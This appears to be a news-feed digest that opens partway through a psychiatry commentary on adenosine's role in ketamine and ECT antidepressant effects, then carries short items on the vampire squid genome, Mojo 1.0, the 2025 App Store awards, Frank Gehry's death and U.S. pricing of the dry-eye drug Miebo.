Finally, to apply this finding to treatment-resistant depression in humans, we must keep in mind the heterogeneity clinical psychiatry knows so well. Some patients do not respond to ketamine, and not all respond to ECT. Do nonresponders have defects in how they produce adenosine, express receptors, or couple receptor signaling? Can adenosine dynamics, appraised with PET tracers for A1 and A2A receptors and, if predictive, with peripheral biomarkers, identify the patients likely to respond? These questions will ultimately determine clinical utility.

A framework for rational development

Unfortunately, psychiatry has long depended more on serendipity than on mechanism. The monoamine hypothesis emerged from accidental discoveries (iproniazid and imipramine). The atypical antipsychotics resulted from chemical modifications aimed at fewer side effects. And ketamine's antidepressant properties were discovered by accident, in studies designed for other purposes. We have been, in Baudrillard's terms, cartographers mapping territories we have not yet crossed: “The territory no longer precedes the map, nor survives it. Henceforth, it is the map that precedes the territory” ( 24 ). We say we know what works without knowing why.

In contrast, Yue et al. provide an extraordinary map, drawn after exquisitely surveying the territory. With adenosine as the mechanistic target, the authors have already demonstrated proof of principle: derivatives with enhanced adenosine signaling show improved therapeutic indices. The path forward involves:

  • Medicinal chemistry optimization of adenosine-enhancing compounds, prioritizing metabolic mitochondrial modulators over NMDAR antagonists.

  • Allosteric modulation of A1 and A2A receptors to enhance endogenous signaling without tonic activation.

  • Non-pharmacological interventions (aIH, potentially others) that leverage adenosine biology.

  • Biomarker development for patient stratification and response prediction.

  • Combination strategies targeting complementary nodes in the adenosine-plasticity cascade.

The technical platform is robust: genetically encoded sensors provide real-time functional readouts for compound screening; the behavioral assays are well-validated; the genetic models allow mechanistic dissection; the therapeutic endpoints (onset, duration, side effects) are clinically meaningful.

Most critical is that the work establishes that rapid antidepressant action is not a pharmacological curiosity of a dissociative anesthetic. A reproducible neurobiological phenomenon, adenosine-driven plasticity in mood-regulatory circuits, can be triggered by multiple routes. This converts an empirical observation (ketamine works fast) into a biological principle (adenosine surges trigger antidepressant plasticity) that guides rational therapeutic development ( Table 1 ).

Table 1. Clinical Implications of Adenosine-Based Antidepressant Mechanisms

| Clinical Domain | Key Finding | Clinical Action |
|---|---|---|
| Caffeine & Treatment Timing | | |
| Chronic consumption | Protective: 20–25% risk reduction ( 12 , 13 ) | Continue usual intake; may prevent depression |
| Acute pre-treatment | Occupies 50–65% of receptors for 3–7 h ( 15 , 16 ) | Consider 12–24 h washout before ketamine/ECT * |
| Mechanistic basis | Tonic signaling (baseline) vs. phasic signaling (treatment surge) | Distinguish chronic protective effects from acute interference potential * |
| Novel Therapeutics | | |
| Improved derivatives | DCK: 5× lower dose, reduced side effects ( 2 ) | Monitor clinical trials of optimized compounds |
| Non-pharmacological | aIH produces adenosine-dependent effects ( 2 ) | Consider for drug-intolerant patients; scalable alternative to ECT |
| A1 receptor agonists | Sufficient for 24 h antidepressant action ( 2 ) | Potential monotherapy or adjunct strategy |
| A2A receptor role | Contributes to acute effects; less sustained than A1 ( 2 ) | May complement A1 activation in combination approaches |
| Mechanistic Insights | | |
| Mitochondrial targeting | Ketamine modulates metabolism directly, not primarily via NMDAR ( 2 ) | Focus drug development on metabolic modulators over NMDAR antagonists |
| ENT1/2 transporters | Mediate adenosine efflux from intracellular compartment ( 2 ) | Consider ENT modulation as therapeutic strategy |
| Metabolic brake | Decreased ATP/ADP ratio precedes adenosine surge ( 2 ) | Target upstream metabolic pathways for novel interventions |
| Patient Stratification | | |
| Genetic predictors | A1/A2A polymorphisms may predict response | Consider genotyping in treatment-resistant cases * |
| Biomarker development | Real-time adenosine monitoring validated; peripheral markers possible ( 2 ) | Research protocols for response prediction; drug screening platform |
| Treatment history | Chronic caffeine users may have upregulated receptors with preserved reserve ( 14 – 16 ) | Caffeine history as potential predictor (requires validation) * |
| Treatment Optimization | | |
| Mechanism separation | Antidepressant ≠ psychomimetic effects ( 2 ) | Lower doses reduce dissociation/abuse risk |
| Circuit specificity | mPFC adenosine necessary & sufficient ( 2 ) | Future: regional targeting strategies; hippocampal effects require further study |
| Temporal dynamics | ∼30 min adenosine surge → days of benefit ( 2 ) | Optimize inter-treatment intervals; single surge sufficient for sustained effects |
| Dose-response | Higher doses prolong duration without increasing peak ( 2 ) | Titrate for optimal balance of efficacy and side effects |
| Safety & Side Effects | | |
| Therapeutic window | DCK effective at 2 mg·kg⁻¹ with minimal hyperlocomotion vs. ketamine 10 mg·kg⁻¹ ( 2 ) | Enhanced safety profile possible with adenosine-optimized compounds |
| Dissociation avoidance | Adenosine mechanism separable from NMDAR psychotomimetic effects ( 2 ) | Target adenosine pathway to minimize dissociative experiences |
| Non-Pharmacological Interventions | | |
| aIH advantages | Non-invasive, safe profile in humans, no complex equipment required ( 9 , 2 ) | Implement in low-resource settings; option for treatment-resistant patients |
| ECT mechanistic insight | Adenosine mediates ECT effects; A1/A2A receptors required ( 2 ) | Optimize ECT protocols based on adenosine dynamics; predict responders * |
| Sleep deprivation | Known to increase adenosine ( 20 ) | Investigate adenosine monitoring during sleep deprivation therapy * |
| Biomarker Applications | | |
| Drug development | Adenosine dynamics as functional readout for compound screening ( 2 ) | Use GRABAdo sensors for phenotypic drug discovery |
| Response prediction | PET tracers for A1/A2A available; peripheral markers under investigation | Develop clinical-grade adenosine monitoring protocols * |
| Treatment monitoring | Real-time adenosine measurement feasible ( 2 ) | Potential for dose optimization during treatment * |
| Combination Strategies | | |
| With existing SSRIs | Adenosine pathway may complement monoaminergic effects | Investigate sequential or concurrent administration * |
| With psychotherapy | Rapid symptom relief may enhance therapy engagement | Time psychotherapy sessions to peak neuroplasticity window * |
| Multi-modal approaches | Combine pharmacological + aIH for additive effects | Pilot studies of combination protocols * |

Conclusions

As we have written before about psychotherapeutics, only time will tell how far our conceptions of causation stand from physical reality. Yue et al. have greatly shortened that distance. What they deliver is a platform: genetically encoded sensors, validated targets, proof-of-principle molecules, non-drug alternatives, and a general model that explains disparate interventions.

The adenosine hypothesis can be tested with readily available tools and carries immediate therapeutic implications. Yue et al. have given the field the aerial view after decades of wandering through the forest of empirical psychopharmacology without looking beyond the next tree.

Perhaps the most intriguing implication of this work lies in an unexpected connection: the most rigorous mechanistic dissection of rapid antidepressant action identifies adenosine as the critical mediator, yet adenosine receptors are the primary target of caffeine, the world's most widely consumed psychoactive substance. Is this merely coincidence, or does it reveal something fundamental about why humans have gravitated toward caffeine consumption across cultures and millennia? The epidemiological protection that chronic coffee drinking confers against depression may represent an inadvertent form of adenosinergic modulation operating at population scale. Yet the same mechanism that provides tonic benefit might interfere with phasic therapeutic surges during acute treatment.

The coffee paradox demands resolution through carefully designed clinical studies. Do regular coffee drinkers show altered responses to ketamine or electroconvulsive therapy? Does pre-treatment caffeine washout enhance therapeutic outcomes? Can we develop dosing strategies that preserve the protective effects of chronic consumption while optimizing acute treatment responses? The convergence of the world's most prevalent psychoactive drug with the mechanistic lynchpin of our most effective rapid antidepressants is unlikely to be accidental. Understanding this intersection may illuminate both the widespread appeal of caffeine and the optimization of adenosine-targeted therapeutics. The next generation of clinical trials should systematically examine caffeine consumption patterns as a critical variable in treatment response, transforming an apparent pharmacological complication into a therapeutic opportunity.

Author contributions

Both authors contributed equally and fully to this article.

Funding sources

The authors are supported by funding from the NIH/National Institute of Mental Health (R0MH127423).

Author disclosures

The authors declare no conflicts of interest.

References

  • 1. Bernard C. An introduction to the study of experimental medicine. New York: Dover Publications; 1957. 226 p.

  • 2. Yue C, Wang N, Zhai H, Yuan Z, Cui Y, Quan J, et al. Adenosine signalling drives antidepressant actions of ketamine and ECT. Nature. 2025. DOI: 10.1038/s41586-025-09755-9. PMID: 41193806

  • 3. Walker AK, Budac DP, Bisulco S, Lee AW, Smith RA, Beenders B, et al. NMDA receptor blockade by ketamine abrogates lipopolysaccharide-induced depressive-like behavior in C57BL/6J mice. Neuropsychopharmacology. 2013;38(9):1609–16. DOI: 10.1038/npp.2013.71. PMID: 23511700; PMCID: PMC3717543

  • 4. Sternberg EM, Licinio J. Overview of neuroimmune stress interactions. Implications for susceptibility to inflammatory disease. Ann NY Acad Sci. 1995;771:364–71. DOI: 10.1111/j.1749-6632.1995.tb44695.x. PMID: 8597414

  • 5. Li H, Zhao Y, Dai R, Geng P, Weng D, Wu W, et al. Astrocytes release ATP/ADP and glutamate in flashes via vesicular exocytosis. Mol Psychiatry. 2025;30(6):2475–89. DOI: 10.1038/s41380-024-02851-8. PMID: 39578520

  • 6. Fond G, Loundou A, Rabu C, Macgregor A, Lancon C, Brittner M, et al. Ketamine administration in depressive disorders: a systematic review and meta-analysis. Psychopharmacology (Berl). 2014;231(18):3663–76. DOI: 10.1007/s00213-014-3664-5. PMID: 25038867

  • 7. Zanos P, Moaddel R, Morris PJ, Riggs LM, Highland JN, Georgiou P, et al. Ketamine and ketamine metabolite pharmacology: insights into therapeutic mechanisms. Pharmacol Rev. 2018;70(3):621–60. DOI: 10.1124/pr.117.015198. PMID: 29945898; PMCID: PMC6020109

  • 8. Zanos P, Moaddel R, Morris PJ, Georgiou P, Fischell J, Elmer GI, et al. NMDAR inhibition-independent antidepressant actions of ketamine metabolites. Nature. 2016;533(7604):481–6. DOI: 10.1038/nature17998. PMID: 27144355; PMCID: PMC4922311

  • 9. Navarrete-Opazo A, Mitchell GS. Therapeutic potential of intermittent hypoxia: a matter of dose. Am J Physiol Regul Integr Comp Physiol. 2014;307(10):R1181–97. DOI: 10.1152/ajpregu.00208.2014. PMID: 25231353; PMCID: PMC4315448

  • 10. Lopes JP, Pliássova A, Cunha RA. The physiological effects of caffeine on synaptic transmission and plasticity in the mouse hippocampus selectively depend on adenosine A1 and A2A receptors. Biochem Pharmacol. 2019;166:313–21. DOI: 10.1016/j.bcp.2019.06.008. PMID: 31199895

  • 11. Fredholm BB, Bättig K, Holmén J, Nehlig A, Zvartau EE. Actions of caffeine in the brain with special reference to factors that contribute to its widespread use. Pharmacol Rev. 1999;51(1):83–133. PMID: 10049999

  • 12. Wang L, Shen X, Wu Y, Zhang D. Coffee and caffeine consumption and depression: a meta-analysis of observational studies. Aust N Z J Psychiatry. 2016;50(3):228–42. DOI: 10.1177/0004867415603131. PMID: 26339067

  • 13. Grosso G, Micek A, Castellano S, Pajak A, Galvano F. Coffee, tea, caffeine and risk of depression: a systematic review and dose-response meta-analysis of observational studies. Mol Nutr Food Res. 2016;60(1):223–34. DOI: 10.1002/mnfr.201500620. PMID: 26518745

  • 14. Holtzman SG, Mante S, Minneman KP. Role of adenosine receptors in caffeine tolerance. J Pharmacol Exp Ther. 1991;256(1):62–8. PMID: 1846425

  • 15. Shryock JC, Ozeck MJ, Belardinelli L. Inverse agonists and neutral antagonists of recombinant human A1 adenosine receptors stably expressed in Chinese hamster ovary cells. Mol Pharmacol. 1998;53(5):886–93. PMID: 9584215

  • 16. Shryock JC, Snowdy S, Baraldi PG, Cacciari B, Spalluto G, Monopoli A, et al. A2A-adenosine receptor reserve for coronary vasodilation. Circulation. 1998;98(7):711–8. DOI: 10.1161/01.cir.98.7.711. PMID: 9715864

  • 17. Ishibashi K, Miura Y, Wagatsuma K, Toyohara J, Ishiwata K, Ishii K. Adenosine A2A receptor occupancy by caffeine after coffee intake in Parkinson's disease. Mov Disord. 2022;37(4):853–7. DOI: 10.1002/mds.28897. PMID: 35001424; PMCID: PMC9306703

  • 18. Björkholm C, Monteggia LM. BDNF – a key transducer of antidepressant effects. Neuropharmacology. 2016;102:72–9. DOI: 10.1016/j.neuropharm.2015.10.034. PMID: 26519901; PMCID: PMC4763983

  • 19. Serchov T, Clement HW, Schwarz MK, Iasevoli F, Tosh DK, Idzko M, et al. Increased signaling via adenosine A1 receptors, sleep deprivation, imipramine, and ketamine inhibit depressive-like behavior via induction of Homer1a. Neuron. 2015;87(3):549–62. DOI: 10.1016/j.neuron.2015.07.010. PMID: 26247862; PMCID: PMC4803038

  • 20. Li N, Lee B, Liu RJ, Banasr M, Dwyer JM, Iwata M, et al. mTOR-dependent synapse formation underlies the rapid antidepressant effects of NMDA antagonists. Science. 2010;329(5994):959–64. DOI: 10.1126/science.1190287. PMID: 20724638; PMCID: PMC3116441

  • 21. Berman RM, Cappiello A, Anand A, Oren DA, Heninger GR, Charney DS, et al. Antidepressant effects of ketamine in depressed patients. Biol Psychiatry. 2000;47(4):351–4. DOI: 10.1016/s0006-3223(99)00230-9. PMID: 10686270

  • 22. Autry AE, Adachi M, Nosyreva E, Na ES, Los MF, Cheng PF, et al. NMDA receptor blockade at rest triggers rapid behavioural antidepressant responses. Nature. 2011;475(7354):91–5. DOI: 10.1038/nature10130. PMID: 21677641; PMCID: PMC3172695

  • 23. Duman RS, Aghajanian GK, Sanacora G, Krystal JH. Synaptic plasticity and depression: new insights from stress and rapid-acting antidepressants. Nat Med. 2016;22(3):238–49. DOI: 10.1038/nm.4050. PMID: 26937618; PMCID: PMC5405628

  • 24. Baudrillard J. Simulacra and simulation. Ann Arbor: University of Michigan Press; 1994. 164 p.

Friday Squid Blogging: Vampire Squid Genome

Schneier
www.schneier.com
2025-12-05 22:06:14
The vampire squid (Vampyroteuthis infernalis) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes. It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging ...
Original Article

The vampire squid ( Vampyroteuthis infernalis ) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes.

It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging onto the cephalopod family tree. It’s neither a squid nor an octopus (nor a vampire), but rather the last, lone remnant of an ancient lineage whose other members have long since vanished.”

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.


The Path to Mojo 1.0

Lobsters
www.modular.com
2025-12-05 21:48:52
Comments...
Original Article

Just about three years ago, the Mojo language started its journey from little more than an idea. Mojo has sure grown up a lot since then, pushing the frontiers of today’s latest accelerators, powering MAX (which in turn drives world-leading AI models), and being adopted by countless developers for a wide range of applications spanning from audio processing to bioinformatics. Today, we’re excited to talk about the next big step in Mojo’s journey: Mojo 1.0!

Our vision for Mojo 1.0

We recently published our vision for Mojo as a language and why Modular built it in the first place. To quote from that document:

Our vision for Mojo is to be the one programming language developers need to target diverse hardware—CPUs, GPUs, and other accelerators—using Python's intuitive syntax combined with modern systems programming capabilities.

Alongside that, we provided our roadmap for Mojo’s development , broken into conceptual phases for the language. Phase 1 leans into Mojo’s initial killer application: writing high-performance kernels for GPUs and CPUs in a powerful, expressive language. The growing number of people learning GPU programming for the first time with our Mojo GPU puzzles is one testament to the value Mojo brings in this area. Mojo has allowed Modular to rapidly get the most out of the latest accelerators on the market and fuels all of Modular’s AI workloads .

While we want Mojo to achieve its full roadmap potential over time, we also want to bring an epoch of stability to the Mojo development experience, and thus a 1.0 version. As such, Mojo will reach 1.0 once we complete the goals we’ve listed for Phase 1 in our roadmap , providing stability for developers seeking a high-performance CPU and GPU programming language.

Work is well underway for the remaining features and quality work we need to complete for this phase, and we feel confident that Mojo will get to 1.0 sometime in 2026. This will also allow us to open source the Mojo compiler as promised .

While we are excited about this milestone, this of course won’t be the end of Mojo development! Some commonly requested capabilities for more general systems programming won’t be completed for 1.0, such as a robust async programming model and support for private members. Read below for more information on that!

Why a 1.0 now?

A 1.0 version for Mojo makes sense now for several reasons: first, we’d like to establish an epoch of stability within the Mojo ecosystem. A vibrant and growing community has formed around Mojo, and more people are looking to build larger projects using it. To date, the rapid pace of change in Mojo and its libraries has been a challenge.

We want to make it much easier to maintain a Mojo project by giving developers the confidence that what they write today won’t break tomorrow. The introduction of semantic versioning, markers for stable and unstable interfaces, and an overall intentionality in language changes will provide an even more solid foundation for someone developing against Mojo 1.x.

Mojo packages that use stabilized APIs should keep building across the 1.x series, even as we continue to add in new features that don’t make 1.0 itself. This will let the growing number of community Mojo libraries interoperate, unlocking increasingly complex Mojo projects.

We’re excited to have more Mojicians come to the platform. Announcing a 1.0 for the language will be a sign to the rest of the world to come and try out Mojo, or to come back and see how it has grown since the last time they kicked the tires. That’s why it’s important to us to have an excellent documentation and tooling experience for new and returning developers.

Planning for Mojo 1.0 has also been hugely valuable to the Modular team, as it provides a forcing function for focus and prioritization. There’s so much that can be worked on when developing a language that it’s helpful to identify what we won’t be able to do before 1.0. That lets us direct effort to making a more solid experience for what Mojo is great at today, and polish an initial set of features before adding more.

Regarding the Mojo standard library, we’ve planned to give sufficient time to run each new language feature through it. This lets us identify bugs or areas of improvement before we call a feature “done”. We also expect 1.0 to have relatively few library features “stabilized” and expand that scope over time incrementally.

What’s next after 1.0?

Mojo 1.0 will be a milestone to celebrate, but it is only a step in a much longer journey. There are many features that won’t quite make the 1.0 launch, some of which we plan to roll out incrementally in 1.x releases. Many of these features (e.g. a “match” statement and enums) will be backward compatible and won’t break existing code, so we can add them into 1.x releases.

That said, we know that Mojo 1.0 won’t be perfect! There are some important language features in Phase 2 of the Mojo language roadmap that will introduce breaking changes to the language and standard library. For example, the ability to mark fields “private” is essential to providing memory safety.

During the development of Mojo 1.x, we will announce plans for a source-breaking Mojo 2.0, and will build support for it under an “experimental” flag to allow opt-in use of this language mode. This means the Mojo compiler will support both 1.x and 2.0 packages, and we aim to make them link-compatible, just as C++20 is source-incompatible with C++98 but developers can build hybrid ecosystems. We will then enable package-by-package migration from 1.x to 2.x over time as 2.0 converges and ships.

Right now we are laser-focused on getting 1.0 out the door, but we have great confidence we’ll be able to navigate this future transition smoothly. Mojo has learned a lot of great things from Python, as well as from the things that didn’t go so well: we’ll do what we can to avoid a transition like Python 2 to 3!

Join the community and follow along!

Our work towards Mojo 1.0 will be done in the open, and we welcome feedback and pull requests that help make the language even better. There are some great ways to participate:

  • Check out the new language and library additions as they roll out on a nightly basis in our open-source modular repository.
  • Have detailed discussions about language and interface design in the Modular forum.
  • Visit our new community page for even more resources.

Mojo 1.0 will be a big step for the language in the year to come!

★ 2025 App Store Award Winners: Tiimo, Essayist, and Detail

Daring Fireball
daringfireball.net
2025-12-05 21:46:12
I did not enjoy them as much as Apple did....
Original Article

Apple, today: “Announcing the 2025 App Store Awards”:

This year’s winners represent the best-in-class apps and games we returned to again and again. We hope you enjoy them as much as we do.

I did not enjoy all of them as much as Apple did.

Tiimo

iPhone app of the year Tiimo bills itself as an “AI Planner & To-do” app that is designed with accommodations for people with ADHD and other neurodivergences. Subscription plans cost $12/month ($144/year) or $54/year ($4.50/month). It does not offer a native Mac app, and at the end of onboarding/account setup, it suggests their web app for use on desktop computers. When I went to the web app, after signing in with the “Sign in With Apple” account I created on the iPhone app, Tiimo prompted me to sign up for an annual subscription for $42/year ($3.50/month), or monthly for $10 ($120/year). The in-app subscriptions offer a 30-day free trial; the less expensive pay-on-the-web subscriptions only offer a 7-day free trial. The web app doesn’t let you do anything without a paid account (or at least starting a trial); the iOS app offers quite a bit of basic functionality free of charge.

From Apple’s own description for why it gave Tiimo the award:

Built to support people who are neurodivergent (and anyone distracted by the hum of modern life), Tiimo brought clarity to our busy schedules using color-coded, emoji-accented blocks. The calming visual approach made even the most hectic days feel manageable.

It starts by syncing everything in Calendar and Reminders, pulling in doctor’s appointments, team meetings, and crucial prompts to walk the dog or stand up and stretch. Instead of dumping it all into a jumbled list, the app gives each item meaning by automatically assigning it a color and an emoji. (Tiimo gave us the option to change the weightlifter emoji it added to our workout reminders, but its pick was spot on.)

While on the move with coffee in one hand and keys in the other, we sometimes talked to Tiimo with the AI chatbot feature to add new tasks or shift appointments. When we felt overwhelmed by our to-do list, Tiimo kept us laser-focused by bubbling up just high-priority tasks, while its built-in Focus timer (accessible from any to-do with a tap) saved us from the pitfalls of multitasking.

But Tiimo really stood out when we faced a big personal project, like getting our Halloween decorations up before Thanksgiving. With the help of AI, the app suggested all the smaller tasks that would get us there: gathering the decorations from the garage, planning the layout, securing the cobwebs, and doing a safety check.

Aside from the web app, Tiimo is iOS exclusive, with apps only for iPhone, iPad, and Apple Watch. No Android version. It seems to do a good job with native platform integration (Calendar integration is free; Reminders integration requires a subscription). Animations in the app feel slow to me, which makes the app itself feel slow. And, personally, I find Tiimo’s emphasis on decorating everything with emoji distracting and childish, not clarifying.

The app seems OK, but not award-worthy to me. But, admittedly, I’m not in the target audience for Tiimo’s ADHD/neurodivergent focus. I don’t need reminders to have coffee in the morning, start work, have dinner, or to watch TV at night, which are all things Tiimo prefilled on my Today schedule after I went through onboarding. As I write this sentence, I’ve been using Tiimo for five minutes, and it’s already prompted me twice to rate it on the App Store. Nope, wait, I just got a third prompt. That’s thirsty, and a little gross. (And, although I’m not an ADHD expert, three prompts to rate and review the app in the first 10 minutes of use strikes me as contrary to the needs of the easily distracted.)

Essayist

Mac app of the year Essayist bills itself as “The Word Processor designed for Academic Writing” (capitalization verbatim). Subscriptions cost $80/year ($6.67/month) or $10/month ($120/year). Its raison d’être is managing citations and references, and automatically formatting the entire document, including citations, according to a variety of standards (MLA, Chicago, etc.). Quoting from Apple’s own description of Essayist:

Essayist gives you an easy way to organize a dizzying array of primary sources. Ebooks, podcasts, presentations, and even direct messages and emails can be cataloged with academic rigor. Using macOS Foundation Models, Essayist extracts all the key info needed to use it as a source.

For example, paste a YouTube URL into an entry and Essayist automatically fills in the name of the video, its publication date, and the date you accessed it. Drag in an article as a PDF to have Essayist fill in the title, author, and more — and store the PDF for easy access. You can also search for the books and journal articles you’re citing right in the app.

Essayist is a document-based (as opposed to library-based) app, and its custom file format is a package with the adorable file extension “.essay”. The default font for documents is Times New Roman, and the only other option is, of all fonts, Arial — and you need an active subscription to switch the font to Arial. (Paying money for the privilege to use Arial... Jiminy fucking christ. I might need a drink.) I appreciate the simplicity of severely limiting font choices to focus the user’s attention on the writing, but offering Times New Roman and Arial as the only options means you’re left with the choice between “the default font’s default font” and “font crime”. The Essayist app itself has no Settings; instead, it offers only per-document settings.

The app carries a few whiffs of non-Mac-likeness (e.g. the aforementioned lack of Settings, and some lame-looking custom alerts). The document settings window refers to a new document, even after it has been saved with a name, as “Untitled” until you close and reopen the document. Reopened documents do not remember their window size and position. But poking around with otool, it appears to be written using AppKit, not Catalyst. I suspected the app might be Catalyst because there are companion iOS apps for iPhone and iPad, which seem to offer the same feature set as the Mac app. Essayist uses a clever system where, unless you have a subscription, documents can only be edited on the device on which they were created, but you can open them read-only on other devices. That feels like a good way to encourage paying while giving you a generous way to evaluate Essayist free of charge. There is no Android, Windows, or web app version — it’s exclusive to Mac and iOS.

I’ve never needed to worry about adhering to a specific format for academic papers, and that’s the one and only reason I can see to use Essayist. In all other aspects, it seems a serviceable but very basic, almost primitive, word processor. There’s no support for embedding images or figures of any kind in a document, for example.

Detail

iPad app of the year Detail bills itself, simply and to the point, as an “AI Video Editor”. The default subscription is $70/year ($5.83/month) with a 3-day free trial; the other option is to pay $12/month ($144/year) with no free trial. After a quick test drive, Detail seems like an excellent video editing app, optimized for creating formats common on social media, like reel-style vertical videos where you, the creator, appear as a cutout in the corner, in front of the video or images that you’re talking about. The iPhone version seems equally good. The iPad version of Detail will install and run on MacOS, but it’s one of those “Designed for iPad / Not verified for macOS” direct conversions. But they do offer a standalone Mac app, Detail Studio, which is a real Mac app, written using AppKit, which requires a separate subscription to unlock pro features ($150/year or $22/month). Detail only offers apps for iOS and MacOS — no Windows, Android, or web.

From Apple’s own acclaim for Detail:

When we used Detail to record a conversation of two people sitting side by side, the app automatically created a cut that looked like it was captured with two cameras. It zoomed in on one speaker, then cut away to the other person’s reaction. The app also made it easy to unleash our inner influencer. We typed a few key points, and the app’s AI wrote a playful script that it loaded into its teleprompter so we could read straight to the camera.

Most importantly, Detail helped us memorialize significant life moments all while staying present. At a birthday party, we propped an iPad on a table and used Detail to record with the front and back cameras simultaneously. The result was a split-screen video with everyone singing “Happy Birthday” on the left and the guest of honor blowing out the candles on the right. (No designated cameraperson needed.)

Detail has a bunch of seemingly genuinely useful AI-based features. But putting all AI features aside, it feels like a thoughtful, richly featured manual video editor. I suspect that’s why the AI features might work well — they’re an ease-of-use / automation layer atop a professional-quality non-AI foundation. Basically, Detail seems like what Apple’s own Clips — recently end-of-life’d — should have been. It turns your iPad (or iPhone) into a self-contained video studio. Cool.


Of these three apps — Tiimo on iPhone, Essayist on Mac, and Detail on iPad — Detail appeals to me the most, and strikes me as the most deserving of this award. If I were to start making videos for modern social media, I’d strongly evaluate Detail as my primary tool.

Apple still has no standalone category for AI apps, but all three of these apps emphasize AI features, and Apple itself calls out those AI features in its praise for them. It’s an obvious recurring theme shared by all three, along with their shared monetization strategies of being free to download with in-app subscriptions to unlock all features, and the fact that all three winners are exclusive to iOS and Mac (and, in Tiimo’s case, the web).

Frank Gehry has died

Hacker News
www.bbc.co.uk
2025-12-05 21:31:40
Comments...
Original Article

Frank Gehry, one of the most influential architects of the last century, has died aged 96.

Gehry was acclaimed for his avant garde, experimental style of architecture. His titanium-covered design of the Guggenheim Museum in Bilbao, Spain, catapulted him to fame in 1997.

He built his daring reputation years before that when he redesigned his own home in Santa Monica, California, using materials like chain-link fencing, plywood and corrugated steel.

His death was confirmed by his chief of staff, Meaghan Lloyd. He is survived by two daughters from his first marriage, Leslie and Brina; his wife, Berta Isabel Aguilera; and their two sons, Alejandro and Samuel.

Born in Toronto in 1929, Gehry moved to Los Angeles as a teenager to study architecture at the University of Southern California before completing further study at the Harvard Graduate School of Design in 1956 and 1957.

After starting his own firm, he broke from the traditional architectural principles of symmetry, using unconventional geometric shapes and unfinished materials in a style now known as deconstructivism.

"I was rebelling against everything," Gehry said in an interview with The New York Times in 2012.

His work in Bilbao put him in high demand, and he went on to design iconic structures in cities all over the world: the Jay Pritzker Pavilion in Chicago's Millennium Park, the Gehry Tower in Germany, and the Louis Vuitton Foundation in Paris.

"He bestowed upon Paris and upon France his greatest masterpiece," said Bernard Arnault, the CEO of LVMH, the worlds largest luxury goods company which owns Louis Vuitton.

With a largely unpredictable style, no two of his works look the same. Prague's Dancing House, finished in 1996, looks like a glass building folding in on itself; his Hotel Marques in Spain, built in 2006, features thin sheets of wavy, multicoloured metal; his design for a business school in Sydney looks like a brown paper bag.

Gehry won the coveted Pritzker Architecture Prize for lifetime achievement in 1989, when he was 60, with his work described as having a "highly refined, sophisticated and adventurous aesthetic".

"His designs, if compared to American music, could best be likened to Jazz, replete with improvisation and a lively unpredictable spirit," ther Pritzker jury said at the time.

Gehry was awarded the Order of Canada in 2002 and the Presidential Medal of Freedom, the highest civilian honour in the US, in 2016.

A $20 drug in Europe requires a prescription and $800 in the U.S.

Hacker News
www.statnews.com
2025-12-05 21:27:22
Comments...
Original Article

A month’s supply of Miebo, Bausch & Lomb’s prescription dry eye drug, costs $800 or more in the U.S. before insurance. But the same drug — sold as EvoTears — has been available over-the-counter (OTC) in Europe since 2015 for about $20. I ordered it online from an overseas pharmacy for $32 including shipping, and it was delivered in a week.

This is, of course, both shocking and unsurprising. A 2021 RAND study found U.S. prescription drug prices are, on average, more than 2.5 times higher than in 32 other developed nations. Miebo exemplifies how some pharmaceutical companies exploit regulatory loopholes and patent protections, prioritizing profits over patients, eroding trust in health care. But there is a way to fix this loophole.

In December 2019, Bausch & Lomb, formerly a division of Valeant, acquired the exclusive license to commercialize and develop NOV03 (now called Miebo in the U.S.) in the United States and Canada. Rather than seeking approval as an OTC drug, as it is sold in Europe, Bausch secured U.S. Food and Drug Administration approval for it as a prescription medication, subsequently pricing it at a high level. Currently, according to GoodRx, a monthly supply of Miebo will cost $830.27 at Walgreens, and it’s listed at $818.38 on Amazon Pharmacy.

The strategy has paid off: Miebo’s 2024 sales — its first full year — hit $172 million, surpassing the company’s projections of $95 million. The company now forecasts sales to exceed $500 million annually. At European prices, those sales would be less than $20 million. Emboldened by Miebo’s early success, Bausch & Lomb raised the price another 4% in 2025, according to the drug price tracking firm 46brooklyn.

Bausch & Lomb has a track record of prioritizing profits over patients. As Valeant, its business model was simple: buy, gut, gouge, repeat. In 2015, it raised prices for Nitropress and Isuprel by over 200% and 500%, respectively, triggering a 2016 congressional hearing. Despite promises of reform, little has changed. When he was at Allergan, Bausch & Lomb’s current CEO, Brent Saunders, pledged “responsible pricing” but tried to extend patent protection for Allergan’s drug Restasis (another dry eye drug) through a dubious deal with the Mohawk Indian tribe, later rejected by courts.

Now at Bausch & Lomb, Saunders oversaw Miebo’s launch, claiming earlier this year in an investor call, “We are once again an innovation company.” But finding a way to get an existing European OTC drug to be a prescription drug in the U.S. with a new name and a 40-fold price increase is not true innovation — it’s a price-gouging strategy.

Bausch & Lomb could have pursued OTC approval in the U.S., leveraging its expertise in OTC eye drops and lotions. However, I could not find in transcripts or presentations any evidence that Bausch & Lomb seriously pursued this. Prescription status, by contrast, ensures much higher prices, protected by patents and limited competition. Even insured patients feel the ripple effects: Coupons may reduce out-of-pocket costs, but insurers pay hundreds per prescription, driving up premiums and the overall cost of health care for everyone.

In response to questions from STAT about why Miebo is an expensive prescription drug, a representative said in a statement, “The FDA determined that MIEBO acts at the cellular and molecular level of the eye, which meant it had to go through the same rigorous process as any new pharmaceutical — a full New Drug Application. Unlike in Europe, where all medical device eye drops are prescription-free and cleared through a highly predictable and fast pathway, we were required to design, enroll and complete extensive clinical trials involving thousands of patients, and provide detailed safety and efficacy data submissions. Those studies took years and significant investment, but they ensure that MIEBO meets the highest regulatory standards for safety and effectiveness.”

Bausch & Lomb’s carefully worded response expertly sidesteps the real issue. The FDA’s test for OTC status isn’t a drug’s mechanism of action — it’s whether patients can use it safely without a doctor. Miebo’s track record as an OTC product in Europe for nearly a decade shows it meets that standard. Bausch & Lomb provides no evidence, or even assertion, that it ever tried for OTC approval in the U.S. Instead, it pursued the prescription route — not because of regulatory necessity, but as a business strategy to secure patents and command an $800 price. In doing so, B&L is weaponizing a regulatory loophole against American patients, prioritizing profit over access, and leaving their “significant investment” as the cost of monopoly, not medical necessity.

